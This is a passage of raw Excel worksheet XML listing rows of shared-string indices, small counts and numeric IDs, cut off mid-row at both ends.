      <c r="C11990">
        <v>0</v>
      </c>
      <c r="D11990">
        <v>5002</v>
      </c>
    </row>
    <row r="11991" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11991" t="s">
        <v>16231</v>
      </c>
      <c r="B11991" t="s">
        <v>16212</v>
      </c>
      <c r="C11991">
        <v>0</v>
      </c>
      <c r="D11991">
        <v>5002</v>
      </c>
    </row>
    <row r="11992" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11992" t="s">
        <v>16228</v>
      </c>
      <c r="B11992" t="s">
        <v>16213</v>
      </c>
      <c r="C11992">
        <v>0</v>
      </c>
      <c r="D11992">
        <v>5002</v>
      </c>
    </row>
    <row r="11993" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11993" t="s">
        <v>16231</v>
      </c>
      <c r="B11993" t="s">
        <v>16214</v>
      </c>
      <c r="C11993">
        <v>0</v>
      </c>
      <c r="D11993">
        <v>5002</v>
      </c>
    </row>
    <row r="11994" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11994" t="s">
        <v>16228</v>
      </c>
      <c r="B11994" t="s">
        <v>16215</v>
      </c>
      <c r="C11994">
        <v>1</v>
      </c>
      <c r="D11994">
        <v>5002</v>
      </c>
    </row>
    <row r="11995" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11995" t="s">
        <v>16231</v>
      </c>
      <c r="B11995" t="s">
        <v>16216</v>
      </c>
      <c r="C11995">
        <v>1</v>
      </c>
      <c r="D11995">
        <v>5002</v>
      </c>
    </row>
    <row r="11996" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11996" t="s">
        <v>16228</v>
      </c>
      <c r="B11996" t="s">
        <v>16217</v>
      </c>
      <c r="C11996">
        <v>3</v>
      </c>
      <c r="D11996">
        <v>5002</v>
      </c>
    </row>
    <row r="11997" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11997" t="s">
        <v>16231</v>
      </c>
      <c r="B11997" t="s">
        <v>16218</v>
      </c>
      <c r="C11997">
        <v>3</v>
      </c>
      <c r="D11997">
        <v>5002</v>
      </c>
    </row>
    <row r="11998" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11998" t="s">
        <v>16229</v>
      </c>
      <c r="B11998" t="s">
        <v>16219</v>
      </c>
      <c r="C11998">
        <v>0</v>
      </c>
      <c r="D11998">
        <v>5002</v>
      </c>
    </row>
    <row r="11999" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11999" t="s">
        <v>16230</v>
      </c>
      <c r="B11999" t="s">
        <v>16220</v>
      </c>
      <c r="C11999">
        <v>0</v>
      </c>
      <c r="D11999">
        <v>5002</v>
      </c>
    </row>
    <row r="12000" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12000" t="s">
        <v>16229</v>
      </c>
      <c r="B12000" t="s">
        <v>16221</v>
      </c>
      <c r="C12000">
        <v>0</v>
      </c>
      <c r="D12000">
        <v>5002</v>
      </c>
    </row>
    <row r="12001" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12001" t="s">
        <v>16230</v>
      </c>
      <c r="B12001" t="s">
        <v>16222</v>
      </c>
      <c r="C12001">
        <v>0</v>
      </c>
      <c r="D12001">
        <v>5002</v>
      </c>
    </row>
    <row r="12002" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12002" t="s">
        <v>16223</v>
      </c>
      <c r="B12002" t="s">
        <v>16223</v>
      </c>
      <c r="C12002">
        <v>25</v>
      </c>
      <c r="D12002">
        <v>5002</v>
      </c>
    </row>
    <row r="12003" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12003" t="s">
        <v>16224</v>
      </c>
      <c r="B12003" t="s">
        <v>16224</v>
      </c>
      <c r="C12003">
        <v>0</v>
      </c>
      <c r="D12003">
        <v>5002</v>
      </c>
    </row>
    <row r="12004" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12004" t="s">
        <v>16228</v>
      </c>
      <c r="B12004" t="s">
        <v>16211</v>
      </c>
      <c r="C12004">
        <v>0</v>
      </c>
      <c r="D12004">
        <v>2267</v>
      </c>
    </row>
    <row r="12005" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12005" t="s">
        <v>16231</v>
      </c>
      <c r="B12005" t="s">
        <v>16212</v>
      </c>
      <c r="C12005">
        <v>2</v>
      </c>
      <c r="D12005">
        <v>2267</v>
      </c>
    </row>
    <row r="12006" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12006" t="s">
        <v>16228</v>
      </c>
      <c r="B12006" t="s">
        <v>16213</v>
      </c>
      <c r="C12006">
        <v>7</v>
      </c>
      <c r="D12006">
        <v>2267</v>
      </c>
    </row>
    <row r="12007" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12007" t="s">
        <v>16231</v>
      </c>
      <c r="B12007" t="s">
        <v>16214</v>
      </c>
      <c r="C12007">
        <v>0</v>
      </c>
      <c r="D12007">
        <v>2267</v>
      </c>
    </row>
    <row r="12008" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12008" t="s">
        <v>16228</v>
      </c>
      <c r="B12008" t="s">
        <v>16215</v>
      </c>
      <c r="C12008">
        <v>7</v>
      </c>
      <c r="D12008">
        <v>2267</v>
      </c>
    </row>
    <row r="12009" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12009" t="s">
        <v>16231</v>
      </c>
      <c r="B12009" t="s">
        <v>16216</v>
      </c>
      <c r="C12009">
        <v>2</v>
      </c>
      <c r="D12009">
        <v>2267</v>
      </c>
    </row>
    <row r="12010" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12010" t="s">
        <v>16228</v>
      </c>
      <c r="B12010" t="s">
        <v>16217</v>
      </c>
      <c r="C12010">
        <v>0</v>
      </c>
      <c r="D12010">
        <v>2267</v>
      </c>
    </row>
    <row r="12011" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12011" t="s">
        <v>16231</v>
      </c>
      <c r="B12011" t="s">
        <v>16218</v>
      </c>
      <c r="C12011">
        <v>0</v>
      </c>
      <c r="D12011">
        <v>2267</v>
      </c>
    </row>
    <row r="12012" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12012" t="s">
        <v>16229</v>
      </c>
      <c r="B12012" t="s">
        <v>16219</v>
      </c>
      <c r="C12012">
        <v>0</v>
      </c>
      <c r="D12012">
        <v>2267</v>
      </c>
    </row>
    <row r="12013" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12013" t="s">
        <v>16230</v>
      </c>
      <c r="B12013" t="s">
        <v>16220</v>
      </c>
      <c r="C12013">
        <v>0</v>
      </c>
      <c r="D12013">
        <v>2267</v>
      </c>
    </row>
    <row r="12014" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12014" t="s">
        <v>16229</v>
      </c>
      <c r="B12014" t="s">
        <v>16221</v>
      </c>
      <c r="C12014">
        <v>15</v>
      </c>
      <c r="D12014">
        <v>2267</v>
      </c>
    </row>
    <row r="12015" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12015" t="s">
        <v>16230</v>
      </c>
      <c r="B12015" t="s">
        <v>16222</v>
      </c>
      <c r="C12015">
        <v>0</v>
      </c>
      <c r="D12015">
        <v>2267</v>
      </c>
    </row>
    <row r="12016" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12016" t="s">
        <v>16223</v>
      </c>
      <c r="B12016" t="s">
        <v>16223</v>
      </c>
      <c r="C12016">
        <v>24</v>
      </c>
      <c r="D12016">
        <v>2267</v>
      </c>
    </row>
    <row r="12017" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12017" t="s">
        <v>16224</v>
      </c>
      <c r="B12017" t="s">
        <v>16224</v>
      </c>
      <c r="C12017">
        <v>1</v>
      </c>
      <c r="D12017">
        <v>2267</v>
      </c>
    </row>
    <row r="12018" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12018" t="s">
        <v>16228</v>
      </c>
      <c r="B12018" t="s">
        <v>16211</v>
      </c>
      <c r="C12018">
        <v>0</v>
      </c>
      <c r="D12018">
        <v>5005</v>
      </c>
    </row>
    <row r="12019" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12019" t="s">
        <v>16231</v>
      </c>
      <c r="B12019" t="s">
        <v>16212</v>
      </c>
      <c r="C12019">
        <v>0</v>
      </c>
      <c r="D12019">
        <v>5005</v>
      </c>
    </row>
    <row r="12020" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12020" t="s">
        <v>16228</v>
      </c>
      <c r="B12020" t="s">
        <v>16213</v>
      </c>
      <c r="C12020">
        <v>0</v>
      </c>
      <c r="D12020">
        <v>5005</v>
      </c>
    </row>
    <row r="12021" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12021" t="s">
        <v>16231</v>
      </c>
      <c r="B12021" t="s">
        <v>16214</v>
      </c>
      <c r="C12021">
        <v>0</v>
      </c>
      <c r="D12021">
        <v>5005</v>
      </c>
    </row>
    <row r="12022" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12022" t="s">
        <v>16228</v>
      </c>
      <c r="B12022" t="s">
        <v>16215</v>
      </c>
      <c r="C12022">
        <v>0</v>
      </c>
      <c r="D12022">
        <v>5005</v>
      </c>
    </row>
    <row r="12023" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12023" t="s">
        <v>16231</v>
      </c>
      <c r="B12023" t="s">
        <v>16216</v>
      </c>
      <c r="C12023">
        <v>1</v>
      </c>
      <c r="D12023">
        <v>5005</v>
      </c>
    </row>
    <row r="12024" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12024" t="s">
        <v>16228</v>
      </c>
      <c r="B12024" t="s">
        <v>16217</v>
      </c>
      <c r="C12024">
        <v>1</v>
      </c>
      <c r="D12024">
        <v>5005</v>
      </c>
    </row>
    <row r="12025" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12025" t="s">
        <v>16231</v>
      </c>
      <c r="B12025" t="s">
        <v>16218</v>
      </c>
      <c r="C12025">
        <v>0</v>
      </c>
      <c r="D12025">
        <v>5005</v>
      </c>
    </row>
    <row r="12026" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12026" t="s">
        <v>16229</v>
      </c>
      <c r="B12026" t="s">
        <v>16219</v>
      </c>
      <c r="C12026">
        <v>0</v>
      </c>
      <c r="D12026">
        <v>5005</v>
      </c>
    </row>
    <row r="12027" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12027" t="s">
        <v>16230</v>
      </c>
      <c r="B12027" t="s">
        <v>16220</v>
      </c>
      <c r="C12027">
        <v>0</v>
      </c>
      <c r="D12027">
        <v>5005</v>
      </c>
    </row>
    <row r="12028" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12028" t="s">
        <v>16229</v>
      </c>
      <c r="B12028" t="s">
        <v>16221</v>
      </c>
      <c r="C12028">
        <v>4</v>
      </c>
      <c r="D12028">
        <v>5005</v>
      </c>
    </row>
    <row r="12029" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12029" t="s">
        <v>16230</v>
      </c>
      <c r="B12029" t="s">
        <v>16222</v>
      </c>
      <c r="C12029">
        <v>1</v>
      </c>
      <c r="D12029">
        <v>5005</v>
      </c>
    </row>
    <row r="12030" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12030" t="s">
        <v>16223</v>
      </c>
      <c r="B12030" t="s">
        <v>16223</v>
      </c>
      <c r="C12030">
        <v>0</v>
      </c>
      <c r="D12030">
        <v>5005</v>
      </c>
    </row>
    <row r="12031" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12031" t="s">
        <v>16224</v>
      </c>
      <c r="B12031" t="s">
        <v>16224</v>
      </c>
      <c r="C12031">
        <v>0</v>
      </c>
      <c r="D12031">
        <v>5005</v>
      </c>
    </row>
    <row r="12032" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12032" t="s">
        <v>16228</v>
      </c>
      <c r="B12032" t="s">
        <v>16211</v>
      </c>
      <c r="C12032">
        <v>0</v>
      </c>
      <c r="D12032">
        <v>2300</v>
      </c>
    </row>
    <row r="12033" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12033" t="s">
        <v>16231</v>
      </c>
      <c r="B12033" t="s">
        <v>16212</v>
      </c>
      <c r="C12033">
        <v>0</v>
      </c>
      <c r="D12033">
        <v>2300</v>
      </c>
    </row>
    <row r="12034" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12034" t="s">
        <v>16228</v>
      </c>
      <c r="B12034" t="s">
        <v>16213</v>
      </c>
      <c r="C12034">
        <v>0</v>
      </c>
      <c r="D12034">
        <v>2300</v>
      </c>
    </row>
    <row r="12035" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12035" t="s">
        <v>16231</v>
      </c>
      <c r="B12035" t="s">
        <v>16214</v>
      </c>
      <c r="C12035">
        <v>0</v>
      </c>
      <c r="D12035">
        <v>2300</v>
      </c>
    </row>
    <row r="12036" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12036" t="s">
        <v>16228</v>
      </c>
      <c r="B12036" t="s">
        <v>16215</v>
      </c>
      <c r="C12036">
        <v>2</v>
      </c>
      <c r="D12036">
        <v>2300</v>
      </c>
    </row>
    <row r="12037" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12037" t="s">
        <v>16231</v>
      </c>
      <c r="B12037" t="s">
        <v>16216</v>
      </c>
      <c r="C12037">
        <v>2</v>
      </c>
      <c r="D12037">
        <v>2300</v>
      </c>
    </row>
    <row r="12038" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12038" t="s">
        <v>16228</v>
      </c>
      <c r="B12038" t="s">
        <v>16217</v>
      </c>
      <c r="C12038">
        <v>20</v>
      </c>
      <c r="D12038">
        <v>2300</v>
      </c>
    </row>
    <row r="12039" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12039" t="s">
        <v>16231</v>
      </c>
      <c r="B12039" t="s">
        <v>16218</v>
      </c>
      <c r="C12039">
        <v>6</v>
      </c>
      <c r="D12039">
        <v>2300</v>
      </c>
    </row>
    <row r="12040" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12040" t="s">
        <v>16229</v>
      </c>
      <c r="B12040" t="s">
        <v>16219</v>
      </c>
      <c r="C12040">
        <v>5</v>
      </c>
      <c r="D12040">
        <v>2300</v>
      </c>
    </row>
    <row r="12041" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12041" t="s">
        <v>16230</v>
      </c>
      <c r="B12041" t="s">
        <v>16220</v>
      </c>
      <c r="C12041">
        <v>0</v>
      </c>
      <c r="D12041">
        <v>2300</v>
      </c>
    </row>
    <row r="12042" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12042" t="s">
        <v>16229</v>
      </c>
      <c r="B12042" t="s">
        <v>16221</v>
      </c>
      <c r="C12042">
        <v>0</v>
      </c>
      <c r="D12042">
        <v>2300</v>
      </c>
    </row>
    <row r="12043" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12043" t="s">
        <v>16230</v>
      </c>
      <c r="B12043" t="s">
        <v>16222</v>
      </c>
      <c r="C12043">
        <v>0</v>
      </c>
      <c r="D12043">
        <v>2300</v>
      </c>
    </row>
    <row r="12044" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12044" t="s">
        <v>16223</v>
      </c>
      <c r="B12044" t="s">
        <v>16223</v>
      </c>
      <c r="C12044">
        <v>26</v>
      </c>
      <c r="D12044">
        <v>2300</v>
      </c>
    </row>
    <row r="12045" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12045" t="s">
        <v>16224</v>
      </c>
      <c r="B12045" t="s">
        <v>16224</v>
      </c>
      <c r="C12045">
        <v>1</v>
      </c>
      <c r="D12045">
        <v>2300</v>
      </c>
    </row>
    <row r="12046" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12046" t="s">
        <v>16231</v>
      </c>
      <c r="B12046" t="s">
        <v>16216</v>
      </c>
      <c r="C12046">
        <v>0</v>
      </c>
      <c r="D12046">
        <v>5005</v>
      </c>
    </row>
    <row r="12047" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12047" t="s">
        <v>16231</v>
      </c>
      <c r="B12047" t="s">
        <v>16218</v>
      </c>
      <c r="C12047">
        <v>1</v>
      </c>
      <c r="D12047">
        <v>5005</v>
      </c>
    </row>
    <row r="12048" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12048" t="s">
        <v>16228</v>
      </c>
      <c r="B12048" t="s">
        <v>16211</v>
      </c>
      <c r="C12048">
        <v>0</v>
      </c>
      <c r="D12048">
        <v>2339</v>
      </c>
    </row>
    <row r="12049" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12049" t="s">
        <v>16231</v>
      </c>
      <c r="B12049" t="s">
        <v>16212</v>
      </c>
      <c r="C12049">
        <v>0</v>
      </c>
      <c r="D12049">
        <v>2339</v>
      </c>
    </row>
    <row r="12050" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12050" t="s">
        <v>16228</v>
      </c>
      <c r="B12050" t="s">
        <v>16213</v>
      </c>
      <c r="C12050">
        <v>0</v>
      </c>
      <c r="D12050">
        <v>2339</v>
      </c>
    </row>
    <row r="12051" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12051" t="s">
        <v>16231</v>
      </c>
      <c r="B12051" t="s">
        <v>16214</v>
      </c>
      <c r="C12051">
        <v>0</v>
      </c>
      <c r="D12051">
        <v>2339</v>
      </c>
    </row>
    <row r="12052" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12052" t="s">
        <v>16228</v>
      </c>
      <c r="B12052" t="s">
        <v>16215</v>
      </c>
      <c r="C12052">
        <v>1</v>
      </c>
      <c r="D12052">
        <v>2339</v>
      </c>
    </row>
    <row r="12053" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12053" t="s">
        <v>16231</v>
      </c>
      <c r="B12053" t="s">
        <v>16216</v>
      </c>
      <c r="C12053">
        <v>1</v>
      </c>
      <c r="D12053">
        <v>2339</v>
      </c>
    </row>
    <row r="12054" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12054" t="s">
        <v>16228</v>
      </c>
      <c r="B12054" t="s">
        <v>16217</v>
      </c>
      <c r="C12054">
        <v>0</v>
      </c>
      <c r="D12054">
        <v>2339</v>
      </c>
    </row>
    <row r="12055" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12055" t="s">
        <v>16231</v>
      </c>
      <c r="B12055" t="s">
        <v>16218</v>
      </c>
      <c r="C12055">
        <v>2</v>
      </c>
      <c r="D12055">
        <v>2339</v>
      </c>
    </row>
    <row r="12056" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12056" t="s">
        <v>16229</v>
      </c>
      <c r="B12056" t="s">
        <v>16219</v>
      </c>
      <c r="C12056">
        <v>0</v>
      </c>
      <c r="D12056">
        <v>2339</v>
      </c>
    </row>
    <row r="12057" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12057" t="s">
        <v>16230</v>
      </c>
      <c r="B12057" t="s">
        <v>16220</v>
      </c>
      <c r="C12057">
        <v>0</v>
      </c>
      <c r="D12057">
        <v>2339</v>
      </c>
    </row>
    <row r="12058" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12058" t="s">
        <v>16229</v>
      </c>
      <c r="B12058" t="s">
        <v>16221</v>
      </c>
      <c r="C12058">
        <v>1</v>
      </c>
      <c r="D12058">
        <v>2339</v>
      </c>
    </row>
    <row r="12059" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12059" t="s">
        <v>16230</v>
      </c>
      <c r="B12059" t="s">
        <v>16222</v>
      </c>
      <c r="C12059">
        <v>2</v>
      </c>
      <c r="D12059">
        <v>2339</v>
      </c>
    </row>
    <row r="12060" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12060" t="s">
        <v>16223</v>
      </c>
      <c r="B12060" t="s">
        <v>16223</v>
      </c>
      <c r="C12060">
        <v>24</v>
      </c>
      <c r="D12060">
        <v>2339</v>
      </c>
    </row>
    <row r="12061" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12061" t="s">
        <v>16224</v>
      </c>
      <c r="B12061" t="s">
        <v>16224</v>
      </c>
      <c r="C12061">
        <v>0</v>
      </c>
      <c r="D12061">
        <v>2339</v>
      </c>
    </row>
    <row r="12062" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12062" t="s">
        <v>16228</v>
      </c>
      <c r="B12062" t="s">
        <v>16211</v>
      </c>
      <c r="C12062">
        <v>2</v>
      </c>
      <c r="D12062">
        <v>4906</v>
      </c>
    </row>
    <row r="12063" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12063" t="s">
        <v>16231</v>
      </c>
      <c r="B12063" t="s">
        <v>16212</v>
      </c>
      <c r="C12063">
        <v>0</v>
      </c>
      <c r="D12063">
        <v>4906</v>
      </c>
    </row>
    <row r="12064" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12064" t="s">
        <v>16228</v>
      </c>
      <c r="B12064" t="s">
        <v>16213</v>
      </c>
      <c r="C12064">
        <v>0</v>
      </c>
      <c r="D12064">
        <v>4906</v>
      </c>
    </row>
    <row r="12065" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12065" t="s">
        <v>16231</v>
      </c>
      <c r="B12065" t="s">
        <v>16214</v>
      </c>
      <c r="C12065">
        <v>3</v>
      </c>
      <c r="D12065">
        <v>4906</v>
      </c>
    </row>
    <row r="12066" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12066" t="s">
        <v>16228</v>
      </c>
      <c r="B12066" t="s">
        <v>16215</v>
      </c>
      <c r="C12066">
        <v>0</v>
      </c>
      <c r="D12066">
        <v>4906</v>
      </c>
    </row>
    <row r="12067" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12067" t="s">
        <v>16231</v>
      </c>
      <c r="B12067" t="s">
        <v>16216</v>
      </c>
      <c r="C12067">
        <v>2</v>
      </c>
      <c r="D12067">
        <v>4906</v>
      </c>
    </row>
    <row r="12068" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12068" t="s">
        <v>16228</v>
      </c>
      <c r="B12068" t="s">
        <v>16217</v>
      </c>
      <c r="C12068">
        <v>0</v>
      </c>
      <c r="D12068">
        <v>4906</v>
      </c>
    </row>
    <row r="12069" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12069" t="s">
        <v>16231</v>
      </c>
      <c r="B12069" t="s">
        <v>16218</v>
      </c>
      <c r="C12069">
        <v>3</v>
      </c>
      <c r="D12069">
        <v>4906</v>
      </c>
    </row>
    <row r="12070" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12070" t="s">
        <v>16229</v>
      </c>
      <c r="B12070" t="s">
        <v>16219</v>
      </c>
      <c r="C12070">
        <v>0</v>
      </c>
      <c r="D12070">
        <v>4906</v>
      </c>
    </row>
    <row r="12071" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12071" t="s">
        <v>16230</v>
      </c>
      <c r="B12071" t="s">
        <v>16220</v>
      </c>
      <c r="C12071">
        <v>0</v>
      </c>
      <c r="D12071">
        <v>4906</v>
      </c>
    </row>
    <row r="12072" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12072" t="s">
        <v>16229</v>
      </c>
      <c r="B12072" t="s">
        <v>16221</v>
      </c>
      <c r="C12072">
        <v>7</v>
      </c>
      <c r="D12072">
        <v>4906</v>
      </c>
    </row>
    <row r="12073" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12073" t="s">
        <v>16230</v>
      </c>
      <c r="B12073" t="s">
        <v>16222</v>
      </c>
      <c r="C12073">
        <v>15</v>
      </c>
      <c r="D12073">
        <v>4906</v>
      </c>
    </row>
    <row r="12074" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12074" t="s">
        <v>16223</v>
      </c>
      <c r="B12074" t="s">
        <v>16223</v>
      </c>
      <c r="C12074">
        <v>26</v>
      </c>
      <c r="D12074">
        <v>4906</v>
      </c>
    </row>
    <row r="12075" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12075" t="s">
        <v>16224</v>
      </c>
      <c r="B12075" t="s">
        <v>16224</v>
      </c>
      <c r="C12075">
        <v>1</v>
      </c>
      <c r="D12075">
        <v>4906</v>
      </c>
    </row>
    <row r="12076" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12076" t="s">
        <v>16228</v>
      </c>
      <c r="B12076" t="s">
        <v>16211</v>
      </c>
      <c r="C12076">
        <v>0</v>
      </c>
      <c r="D12076">
        <v>5025</v>
      </c>
    </row>
    <row r="12077" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12077" t="s">
        <v>16231</v>
      </c>
      <c r="B12077" t="s">
        <v>16212</v>
      </c>
      <c r="C12077">
        <v>0</v>
      </c>
      <c r="D12077">
        <v>5025</v>
      </c>
    </row>
    <row r="12078" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12078" t="s">
        <v>16228</v>
      </c>
      <c r="B12078" t="s">
        <v>16213</v>
      </c>
      <c r="C12078">
        <v>1</v>
      </c>
      <c r="D12078">
        <v>5025</v>
      </c>
    </row>
    <row r="12079" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12079" t="s">
        <v>16231</v>
      </c>
      <c r="B12079" t="s">
        <v>16214</v>
      </c>
      <c r="C12079">
        <v>1</v>
      </c>
      <c r="D12079">
        <v>5025</v>
      </c>
    </row>
    <row r="12080" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12080" t="s">
        <v>16228</v>
      </c>
      <c r="B12080" t="s">
        <v>16215</v>
      </c>
      <c r="C12080">
        <v>0</v>
      </c>
      <c r="D12080">
        <v>5025</v>
      </c>
    </row>
    <row r="12081" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12081" t="s">
        <v>16231</v>
      </c>
      <c r="B12081" t="s">
        <v>16216</v>
      </c>
      <c r="C12081">
        <v>0</v>
      </c>
      <c r="D12081">
        <v>5025</v>
      </c>
    </row>
    <row r="12082" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12082" t="s">
        <v>16228</v>
      </c>
      <c r="B12082" t="s">
        <v>16217</v>
      </c>
      <c r="C12082">
        <v>0</v>
      </c>
      <c r="D12082">
        <v>5025</v>
      </c>
    </row>
    <row r="12083" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12083" t="s">
        <v>16231</v>
      </c>
      <c r="B12083" t="s">
        <v>16218</v>
      </c>
      <c r="C12083">
        <v>0</v>
      </c>
      <c r="D12083">
        <v>5025</v>
      </c>
    </row>
    <row r="12084" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12084" t="s">
        <v>16229</v>
      </c>
      <c r="B12084" t="s">
        <v>16219</v>
      </c>
      <c r="C12084">
        <v>3</v>
      </c>
      <c r="D12084">
        <v>5025</v>
      </c>
    </row>
    <row r="12085" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12085" t="s">
        <v>16230</v>
      </c>
      <c r="B12085" t="s">
        <v>16220</v>
      </c>
      <c r="C12085">
        <v>0</v>
      </c>
      <c r="D12085">
        <v>5025</v>
      </c>
    </row>
    <row r="12086" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12086" t="s">
        <v>16229</v>
      </c>
      <c r="B12086" t="s">
        <v>16221</v>
      </c>
      <c r="C12086">
        <v>0</v>
      </c>
      <c r="D12086">
        <v>5025</v>
      </c>
    </row>
    <row r="12087" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12087" t="s">
        <v>16230</v>
      </c>
      <c r="B12087" t="s">
        <v>16222</v>
      </c>
      <c r="C12087">
        <v>0</v>
      </c>
      <c r="D12087">
        <v>5025</v>
      </c>
    </row>
    <row r="12088" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12088" t="s">
        <v>16223</v>
      </c>
      <c r="B12088" t="s">
        <v>16223</v>
      </c>
      <c r="C12088">
        <v>0</v>
      </c>
      <c r="D12088">
        <v>5025</v>
      </c>
    </row>
    <row r="12089" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12089" t="s">
        <v>16224</v>
      </c>
      <c r="B12089" t="s">
        <v>16224</v>
      </c>
      <c r="C12089">
        <v>0</v>
      </c>
      <c r="D12089">
        <v>5025</v>
      </c>
    </row>
    <row r="12090" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12090" t="s">
        <v>16224</v>
      </c>
      <c r="B12090" t="s">
        <v>16224</v>
      </c>
      <c r="C12090">
        <v>1</v>
      </c>
      <c r="D12090">
        <v>2731</v>
      </c>
    </row>
    <row r="12091" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12091" t="s">
        <v>16228</v>
      </c>
      <c r="B12091" t="s">
        <v>16211</v>
      </c>
      <c r="C12091">
        <v>0</v>
      </c>
      <c r="D12091">
        <v>138</v>
      </c>
    </row>
    <row r="12092" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12092" t="s">
        <v>16231</v>
      </c>
      <c r="B12092" t="s">
        <v>16212</v>
      </c>
      <c r="C12092">
        <v>0</v>
      </c>
      <c r="D12092">
        <v>138</v>
      </c>
    </row>
    <row r="12093" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12093" t="s">
        <v>16228</v>
      </c>
      <c r="B12093" t="s">
        <v>16213</v>
      </c>
      <c r="C12093">
        <v>0</v>
      </c>
      <c r="D12093">
        <v>138</v>
      </c>
    </row>
    <row r="12094" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12094" t="s">
        <v>16231</v>
      </c>
      <c r="B12094" t="s">
        <v>16214</v>
      </c>
      <c r="C12094">
        <v>0</v>
      </c>
      <c r="D12094">
        <v>138</v>
      </c>
    </row>
    <row r="12095" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12095" t="s">
        <v>16228</v>
      </c>
      <c r="B12095" t="s">
